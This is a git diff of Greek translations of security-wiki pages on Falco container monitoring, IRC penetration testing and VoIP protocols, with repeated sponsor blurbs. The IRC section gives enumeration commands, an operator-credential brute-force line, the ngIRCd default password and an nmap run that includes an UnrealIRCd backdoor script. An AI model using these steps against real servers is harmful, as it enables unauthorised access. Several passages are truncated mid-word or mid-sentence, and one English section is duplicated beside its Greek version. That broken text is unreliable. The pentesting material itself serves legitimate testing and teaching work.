* Σημειώστε στο παρακάτω τμήμα πώς **ο Falco συντάσσει ένα πυρήνα module και το εισάγει**. Έπειτα, φορτώνει τους κανόνες και **αρχίζει να καταγράφει ύποπτες δραστηριότητες**. Σε αυτήν την περίπτωση, έχει ανιχνεύσει 2 προνομιούχα containers που ξεκίνησαν, 1 από αυτά με ευαίσθητο mount, και μετά από λίγα δευτερόλεπτα ανιχνεύει πώς άνοιξε ένα shell μέσα σε ένα από τα containers.
|
||||
* Μπορείτε να χρησιμοποιήσετε το εργαλείο [https://github.com/falcosecurity/falco](https://github.com/falcosecurity/falco) για να ανιχνεύσετε **υπούλες συμπεριφορές σε εκτελούμενα containers**.
|
||||
* Σημειώστε στο ακόλουθο τμήμα πώς **ο Falco συντάσσει ένα πυρήνα module και τον εισάγει**. Έπειτα, φορτώνει τους κανόνες και **ξεκινά την καταγραφή ύποπτων δραστηριοτήτων**. Σε αυτήν την περίπτωση, έχει ανιχνεύσει 2 προνομιούχα containers που ξεκίνησαν, έναν εκ των οποίων με ευαίσθητο mount, και μετά από λίγα δευτερόλεπτα ανιχνεύθηκε πώς άνοιξε ένα κέλυφος μέσα σε έναν από τους containers.
|
||||
```bash
|
||||
docker run -it --privileged -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro falco
|
||||
* Setting up /usr/src links from host
|
||||
|
@ -316,24 +325,39 @@ falco-probe found and loaded in dkms
|
|||
2021-01-04T12:03:24.664354000+0000: Notice Privileged container started (user=root command=container:4443a8daceb8 focused_brahmagupta (id=4443a8daceb8) image=falco:latest)
|
||||
2021-01-04T12:04:56.270553320+0000: Notice A shell was spawned in a container with an attached terminal (user=root xenodochial_kepler (id=4822e8378c00) shell=bash parent=runc cmdline=bash terminal=34816 container_id=4822e8378c00 image=ubuntu)
|
||||
```
|
||||
### Παρακολούθηση του Docker
|
||||
#### Παρακολούθηση Docker
|
||||
|
||||
Μπορείτε να χρησιμοποιήσετε το auditd για να παρακολουθήσετε το Docker.
|
||||
Μπορείτε να χρησιμοποιήσετε το auditd για την παρακολούθηση του docker.
|
||||
|
||||
### Αναφορές
|
||||
|
||||
## Αναφορές
|
||||
* [https://ti8m.com/blog/Why-Podman-is-worth-a-look-.html](https://ti8m.com/blog/Why-Podman-is-worth-a-look-.html)
|
||||
* [https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc](https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc)
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει δωρεάν λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αποκλεισμών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα αποθετήρια του [**HackTricks**](https://github.com/carlospolop/hacktricks) και του [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,26 +1,40 @@
|
|||
# 194,6667,6660-7000 - Ελέγχος Ασφάλειας IRC
|
||||
# 194,6667,6660-7000 - Ελεγχος Εισβολής στο IRC
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Ερυθρού Συνεργείου AWS του HackTricks)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**The PEASS Family**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στην** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα τηλεγράφου**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των καταλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
---
|
||||
|
||||
## Βασικές Πληροφορίες
|
||||
|
||||
Το IRC, αρχικά ένα **πρωτόκολλο κειμένου**, ανατέθηκε το **194/TCP** από το IANA, αλλά συνήθως λειτουργεί σε θύρες όπως **6667/TCP** και παρόμοιες για να αποφευχθεί η ανάγκη για **δικαιώματα root** για τη λειτουργία του.
|
||||
Το IRC, αρχικά ένα **πρωτόκολλο κειμένου**, ανατέθηκε στο **194/TCP** από το IANA, αλλά συνήθως λειτουργεί στα **6667/TCP** και παρόμοιες θύρες για να μην χρειάζεται **δικαιώματα ρίζας** για λειτουργία.
|
||||
|
||||
Ένα **ψευδώνυμο** είναι όλο όσο χρειάζεται για να συνδεθεί κάποιος σε ένα διακομιστή. Μετά τη σύνδεση, ο διακομιστής πραγματοποιεί αντίστροφη αναζήτηση DNS στη διεύθυνση IP του χρήστη.
|
||||
Ένα **ψευδώνυμο** είναι ό,τι χρειάζεται για να συνδεθείτε σε ένα διακομιστή. Μετά τη σύνδεση, ο διακομιστής εκτελεί αναζήτηση αντίστροφης DNS στη διεύθυνση IP του χρήστη.
|
||||
|
||||
Οι χρήστες χωρίζονται σε **χειριστές**, οι οποίοι χρειάζονται ένα **όνομα χρήστη** και **κωδικό πρόσβασης** για περισσότερη πρόσβαση, και κανονικούς **χρήστες**. Οι χειριστές έχουν διάφορα επίπεδα προνομίων, με τους διαχειριστές στην κορυφή.
|
||||
Οι χρήστες διαιρούνται σε **operators**, που χρειάζονται ένα **όνομα χρήστη** και **κωδικό πρόσβασης** για περισσότερη πρόσβαση, και κανονικούς **χρήστες**. Οι operators έχουν διαφορετικά επίπεδα προνομίων, με τους διαχειριστές στην κορυφή.
|
||||
|
||||
**Προεπιλεγμένες θύρες:** 194, 6667, 6660-7000
|
||||
```
|
||||
|
@ -38,7 +52,7 @@ openssl s_client -connect <IP>:<PORT> -quiet
|
|||
```
|
||||
### Εγχειρίδιο
|
||||
|
||||
Εδώ μπορείτε να δείτε πώς να συνδεθείτε και να αποκτήσετε πρόσβαση στο IRC χρησιμοποιώντας ένα **τυχαίο ψευδώνυμο** και στη συνέχεια να απαριθμήσετε μερικές ενδιαφέρουσες πληροφορίες. Μπορείτε να μάθετε περισσότερες εντολές του IRC [εδώ](https://en.wikipedia.org/wiki/List\_of\_Internet\_Relay\_Chat\_commands#USERIP).
|
||||
Εδώ μπορείτε να δείτε πως να συνδεθείτε και να έχετε πρόσβαση στο IRC χρησιμοποιώντας ένα **τυχαίο ψευδώνυμο** και στη συνέχεια να απαριθμήσετε μερικές ενδιαφέρουσες πληροφορίες. Μπορείτε να μάθετε περισσότερες εντολές του IRC [εδώ](https://en.wikipedia.org/wiki/List\_of\_Internet\_Relay\_Chat\_commands#USERIP).
|
||||
```bash
|
||||
#Connection with random nickname
|
||||
USER ran213eqdw123 0 * ran213eqdw123
|
||||
|
@ -67,62 +81,30 @@ JOIN <CHANNEL_NAME> #Connect to a channel
|
|||
#Operator creds Brute-Force
|
||||
OPER <USERNAME> <PASSWORD>
|
||||
```
|
||||
Μπορείτε, επίσης, να προσπαθήσετε να συνδεθείτε στον διακομιστή με έναν κωδικό πρόσβασης. Ο προεπιλεγμένος κωδικός πρόσβασης για τον ngIRCd είναι `wealllikedebian`.
|
||||
Μπορείτε, επίσης, να προσπαθήσετε να συνδεθείτε στον διακομιστή με έναν κωδικό πρόσβασης. Ο προεπιλεγμένος κωδικός πρόσβασης για το ngIRCd είναι `wealllikedebian`.
|
||||
```bash
|
||||
PASS wealllikedebian
|
||||
NICK patrick
|
||||
USER test1 test2 <IP> :test3
|
||||
```
|
||||
### **Εύρεση και σάρωση υπηρεσιών IRC**
|
||||
|
||||
To find IRC services, you can use tools like Nmap or Masscan to scan for open ports on a target system. The default port for IRC is 6667, but it can also be configured to use other ports.
|
||||
|
||||
```plaintext
|
||||
$ nmap -p 6667 <target_ip>
|
||||
```
|
||||
|
||||
Once you have identified an open IRC port, you can connect to it using an IRC client like Irssi or HexChat. These clients allow you to interact with the IRC server and its channels.
|
||||
|
||||
```plaintext
|
||||
$ irssi -c <target_ip> -p 6667
|
||||
```
|
||||
|
||||
After connecting to the IRC server, you can join different channels and interact with other users. It is important to familiarize yourself with IRC commands and protocols to effectively navigate and communicate within the IRC network.
|
||||
|
||||
### **Εύρεση και σάρωση υπηρεσιών IRC**
|
||||
|
||||
Για να βρείτε υπηρεσίες IRC, μπορείτε να χρησιμοποιήσετε εργαλεία όπως το Nmap ή το Masscan για να σαρώσετε ανοιχτές θύρες σε ένα σύστημα στόχο. Η προεπιλεγμένη θύρα για το IRC είναι η 6667, αλλά μπορεί επίσης να έχει ρυθμιστεί να χρησιμοποιεί άλλες θύρες.
|
||||
|
||||
```plaintext
|
||||
$ nmap -p 6667 <target_ip>
|
||||
```
|
||||
|
||||
Αφού εντοπίσετε μια ανοιχτή θύρα IRC, μπορείτε να συνδεθείτε σε αυτήν χρησιμοποιώντας έναν πελάτη IRC όπως το Irssi ή το HexChat. Αυτοί οι πελάτες σας επιτρέπουν να αλληλεπιδράσετε με τον διακομιστή IRC και τα κανάλια του.
|
||||
|
||||
```plaintext
|
||||
$ irssi -c <target_ip> -p 6667
|
||||
```
|
||||
|
||||
Αφού συνδεθείτε στον διακομιστή IRC, μπορείτε να ενταχθείτε σε διάφορα κανάλια και να αλληλεπιδράσετε με άλλους χρήστες. Είναι σημαντικό να εξοικειωθείτε με τις εντολές και τους πρωτοκόλλους του IRC για να πλοηγηθείτε και να επικοινωνήσετε αποτελεσματικά εντός του δικτύου IRC.
|
||||
### **Εντοπισμός και σάρωση υπηρεσιών IRC**
|
||||
```bash
|
||||
nmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 194,6660-7000 <ip>
|
||||
```
|
||||
### [Βίαιη Δύναμη](../generic-methodologies-and-resources/brute-force.md#irc)
|
||||
### [Επίθεση Με Βίαιο Κατάληψη (Brute Force)](../generic-methodologies-and-resources/brute-force.md#irc)
|
||||
|
||||
### Shodan
|
||||
|
||||
* `αναζήτηση του ονόματος του υπολογιστή σας`
|
||||
|
||||
<details>
|
||||
## WhiteIntel
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει δωρεάν λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
|
||||
* Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των καταλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
|
||||
</details>
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
|
|
@ -1,22 +1,36 @@
|
|||
# Βασικά πρωτόκολλα VoIP
|
||||
# Βασικά Πρωτόκολλα VoIP
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** Ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**The PEASS Family**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο βασικός στόχος του WhiteIntel είναι η καταπολέμηση των αποκλεισμών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κλοπή πληροφοριών.
|
||||
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
---
|
||||
|
||||
## Πρωτόκολλα Σήμανσης
|
||||
|
||||
### SIP (Session Initiation Protocol)
|
||||
### SIP (Πρωτόκολλο Έναρξης Συνεδρίας)
|
||||
|
||||
Αυτό είναι το βιομηχανικό πρότυπο, για περισσότερες πληροφορίες ελέγξτε:
|
||||
|
||||
|
@ -24,37 +38,56 @@
|
|||
[sip-session-initiation-protocol.md](sip-session-initiation-protocol.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
### MGCP (Media Gateway Control Protocol)
|
||||
### MGCP (Πρωτόκολλο Έλεγχου Πύλης Μέσων)
|
||||
|
||||
Το MGCP (Media Gateway Control Protocol) είναι ένα **πρωτόκολλο σήμανσης** και **έλεγχου κλήσης** που περιγράφεται στο RFC 3435. Λειτουργεί σε μια κεντρική αρχιτεκτονική, η οποία αποτελείται από τρία κύρια στοιχεία:
|
||||
Το MGCP (Media Gateway Control Protocol) είναι ένα **πρωτόκολλο σήμανσης** και **έλεγχου κλήσεων** που περιγράφεται στο RFC 3435. Λειτουργεί σε μια κεντρική αρχιτεκτονική, η οποία αποτελείται από τρία κύρια στοιχεία:
|
||||
|
||||
1. **Διαχειριστής κλήσης ή Ελεγκτής Πύλης Πολυμέσων (MGC)**: Η κύρια πύλη στην αρχιτεκτονική MGCP είναι υπεύθυνη για τη **διαχείριση και έλεγχο των πυλών πολυμέσων**. Χειρίζεται τις διαδικασίες εγκατάστασης, τροποποίησης και τερματισμού κλήσεων. Ο MGC επικοινωνεί με τις πύλες πολυμέσων χρησιμοποιώντας το πρωτόκολλο MGCP.
|
||||
2. **Πύλες Πολυμέσων (MGs) ή Πύλες Δούλευσης**: Αυτές οι συσκευές **μετατρέπουν ψηφιακά ροές πολυμέσων μεταξύ διαφορετικών δικτύων**, όπως η παραδοσιακή τηλεφωνία με κύκλωμα και τα δίκτυα IP με κύκλωμα πακέτων. Διαχειρίζονται από το MGC και εκτελούν εντολές που λαμβάνουν από αυτόν. Οι πύλες πολυμέσων μπορεί να περιλαμβάνουν λειτουργίες όπως μετατροπή κωδικοποίησης, πακετοποίηση και ακύρωση ηχούς.
|
||||
3. **Πύλες Σήμανσης (SGs)**: Αυτές οι πύλες είναι υπεύθυνες για τη **μετατροπή μηνυμάτων σήμανσης μεταξύ διαφορετικών δικτύων**, δυνατοποιώντας απρόσκοπτη επικοινωνία μεταξύ παραδοσιακών συστημάτων τηλεφωνίας (π.χ. SS7) και δικτύων βασισμένων σε IP (π.χ. SIP ή H.323). Οι πύλες σήμανσης είναι κρίσιμες για τη διαλειτουργικότητα και τη διασφάλιση ότι οι πληροφορίες έλεγχου κλήσης μεταδίδονται σωστά μεταξύ των διαφορετικών δικτύων.
|
||||
1. **Πράκτορας Κλήσης ή Ελεγκτής Πύλης Μέσων (MGC)**: Η κύρια πύλη στην αρχιτεκτονική του MGCP είναι υπεύθυνη για τη **διαχείριση και έλεγχο των πυλών μέσων**. Χειρίζεται τις διαδικασίες εγκατάστασης, τροποποίησης και τερματισμού κλήσεων. Ο MGC επικοινωνεί με τις πύλες μέσων χρησιμοποιώντας το πρωτόκολλο MGCP.
|
||||
2. **Πύλες Μέσων (MGs) ή Πύλες Δούλων**: Αυτές οι συσκευές **μετατρέπουν ψηφιακά ρεύματα μέσων μεταξύ διαφορετικών δικτύων**, όπως οι παραδοσιακές τηλεφωνίες με κύκλωμα εναλλαγής και τα δίκτυα IP με κύκλωμα πακέτων. Διαχειρίζονται από το MGC και εκτελούν εντολές που λαμβάνουν από αυτό. Οι πύλες μέσων μπορεί να περιλαμβάνουν λειτουργίες όπως μετατροπή κωδικοποίησης, πακετοποίηση και ακύρωση ηχούς.
|
||||
3. **Πύλες Σήμανσης (SGs)**: Αυτές οι πύλες είναι υπεύθυνες για τη **μετατροπή μηνυμάτων σήμανσης μεταξύ διαφορετικών δικτύων**, επιτρέποντας απρόσκοπτη επικοινωνία μεταξύ παραδοσιακών συστημάτων τηλεφωνίας (π.χ. SS7) και δικτύων βασισμένων σε IP (π.χ. SIP ή H.323). Οι πύλες σήμανσης είναι κρίσιμες για την αλληλεπίδραση και τη διασφάλιση ότι οι πληροφορίες ελέγχου κλήσης μεταδίδονται σωστά μεταξύ των διαφορετικών δικτύων.
|
||||
|
||||
Συνολικά, το MGCP κεντρικεύει τη λογική έλεγχου κλήσης στον διαχειριστή κλήσης, πράγμα που απλοποιεί τη διαχείριση των πυλών πολυμέσων και σήμανσης, παρέχοντας καλύτερη κλιμακωσιμότ
|
||||
## Πρωτόκολλα Μετάδοσης και Μεταφοράς
|
||||
Συνολικά, το MGCP κεντρικοποιεί τη λογική έλεγχου κλήσεων στον πράκτορα κλήσεων, το οποίο απλοποιεί τη διαχείριση των πυλών μέσων και σήμανσης, παρέχοντας καλύτερη επεκτασιμότητα, αξιοπιστία και αποτελεσματικότητα στα τηλεπικοινωνιακά δίκτυα.
|
||||
|
||||
### SCCP (Πρωτόκολλο Ελέγχου Πελάτη Skinny)
|
||||
|
||||
Το Skinny Client Control Protocol (SCCP) είναι ένα **ιδιόκτητο πρωτόκολλο σήμανσης και ελέγχου κλήσεων** που ανήκει στην Cisco Systems. Χρησιμοποιείται κυρίως για την επικοινωνία μεταξύ του **Cisco Unified Communications Manager** (προηγουμένως γνωστού ως CallManager) και των Cisco IP τηλεφώνων ή άλλων Cisco συσκευών φωνής και βίντεο.
|
||||
|
||||
Τα κύρια στοιχεία ενός συστήματος βασισμένου στο SCCP είναι:
|
||||
|
||||
1. **Διακομιστής Ελέγχου Κλήσεων**: Αυτός ο διακομιστής, συνήθως ένας Cisco Unified Communications Manager, διαχειρίζεται τις διαδικασίες εγκατάστασης κλήσεων, τροποποίησης και τερματισμού, καθώς και άλλες λειτουργίες τηλεφωνίας όπως προώθηση κλήσεων, μεταφορά κλήσεων και κράτηση κλήσεων.
|
||||
2. **Σημεία Τέλους SCCP**: Αυτές είναι συσκευές όπως IP τηλέφωνα, μονάδες βιντεοδιάσκεψης ή άλλες Cisco συσκευές φωνής και βίντεο που χρησιμοποιούν το SCCP για να επικοινωνήσουν με το διακομιστή ελέγχου κλήσεων. Εγγράφονται στο διακομιστή, στέλνουν και λαμβάνουν μηνύματα σήμανσης και ακολουθούν τις οδηγίες που παρέχει ο διακομιστής ελέγχου κλήσεων για τη διαχείριση κλήσεων.
|
||||
3. **Πύλες**: Αυτές οι συσκευές, όπως πύλες φωνής ή πύλες μέσων, είναι υπεύθυνες για τη μετατροπή ροών μέσων μεταξύ διαφορετικών δικτύων, όπως οι παραδοσιακές τηλεφωνίες με κύκλωμα εναλλαγής και τα δίκτυα IP με κύκλωμα πακέτων. Μπορεί να περιλαμβάνουν επιπλέον λειτουργίες, όπως μετατροπή κωδικοποίησης ή ακύρωση ηχούς.
|
||||
|
||||
Το SCCP προσφέρει έναν απλό και αποτελεσματικό τρόπο επικοινωνίας μεταξύ των διακομιστών ελέγχου κλήσεων Cisco και των σημείων τέλους. Ωστόσο, αξίζει να σημειωθεί ότι το **SCCP είναι ένα ιδιόκτητο πρωτόκολλο**, το οποίο μπορεί να περιορίσει την αλληλεπιδραστικότητα με μη-Cisco συστήματα. Σε τέτοιες περιπτώσεις, άλλα πρότυπα πρωτόκολλα VoIP όπως το SIP μπορεί να είναι πιο κατάλληλα.
|
||||
|
||||
### H.323
|
||||
|
||||
Το H.323 είναι ένα **
|
||||
## Πρωτόκολλα Μετάδοσης & Μεταφοράς
|
||||
|
||||
### SDP (Πρωτόκολλο Περιγραφής Συνεδρίας)
|
||||
|
||||
Το SDP (Session Description Protocol) είναι ένα **κειμενοπροσανατολισμένο μορφότυπο** που χρησιμοποιείται για να περιγράψει τα χαρακτηριστικά πολυμέσων συνεδριών, όπως φωνή, βίντεο ή διάσκεψη δεδομένων, σε δίκτυα IP. Αναπτύχθηκε από το **Internet Engineering Task Force (IETF)** και καθορίζεται στο **RFC 4566**. Το SDP δεν χειρίζεται την πραγματική μετάδοση πολυμέσων ή την ίδρυση συνεδρίας, αλλά χρησιμοποιείται σε συνδυασμό με άλλα πρωτόκολλα σήμανσης, όπως το **SIP (Session Initiation Protocol)**, για τη διαπραγμάτευση και την ανταλλαγή πληροφοριών σχετικά με τα ροές πολυμέσων και τα χαρακτηριστικά τους.
|
||||
